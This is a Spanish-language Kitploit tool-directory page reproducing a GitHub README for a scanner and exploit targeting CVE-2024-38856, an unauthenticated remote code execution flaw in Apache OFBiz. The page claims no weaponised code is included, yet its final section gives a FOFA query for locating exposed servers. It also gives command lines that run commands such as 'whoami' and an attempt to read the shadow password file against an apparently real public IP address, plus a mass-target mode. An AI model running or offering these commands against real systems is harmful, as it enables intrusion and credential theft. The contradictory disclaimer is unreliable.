Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-38856-Apache-OFBiz — CVE-2024-38856: Escáner y Exploit de ejecución remota de código de Apache OFBiz | Kitploit
Herramientas/GitHubGitHub/hex00-0x4/cve-2024-38856-apache-ofbiz
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubhex00-0x4/cve-2024-38856-apache-ofbiz

CVE-2024-38856-Apache-OFBiz

CVE-2024-38856: Escáner y Exploit de ejecución remota de código de Apache OFBiz

Ver Repositorio
33hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-38856 — Apache OFBiz (Documentación del repositorio)

Propósito del repositorio: documentación informativa sobre CVE-2024-38856 (autorización incorrecta / RCE pre-autenticación en Apache OFBiz).
Este repositorio no contiene código de exploit armado. Está destinado únicamente a investigación defensiva, orientación sobre parches, detección y pruebas seguras en laboratorio.


Resumen

CVE-2024-38856 es una vulnerabilidad de autorización incorrecta en Apache OFBiz que puede permitir el acceso no autenticado a ciertos endpoints y, bajo condiciones específicas, habilitar la ejecución de código de renderizado de pantalla que puede llevar a la ejecución remota de código en los sistemas afectados. El problema se corrigió en Apache OFBiz 18.12.15; las versiones anteriores hasta 18.12.14 están afectadas. :contentReference[oaicite:0]{index=0}

Gravedad/Impacto: múltiples proveedores de seguridad e investigadores calificaron esta vulnerabilidad como crítica — puede llevar a la ejecución remota de código no autenticada en instancias vulnerables, y se ha observado en intentos de explotación activa en la naturaleza. Los administradores deben tratar las instancias expuestas de OFBiz como elementos de remediación de alta prioridad. :contentReference[oaicite:1]{index=1}


Versiones afectadas

  • Apache OFBiz: hasta 18.12.14 (es decir, todas las versiones <= 18.12.14 se consideran vulnerables). El problema se solucionó en 18.12.15. Se recomienda actualizar. :contentReference[oaicite:2]{index=2}

fofa : app="Apache_OFBiz" && port="8443"
Screenshot 2025-10-10 183057

Exploit:

git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git

cd CVE-2024-38856-Apache-OFBiz

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"

Screenshot 2025-10-10 184101

─$ python3 apache_bang.py --file target.txt -c "ls"

Screenshot 2025-10-10 075018
Descargar herramienta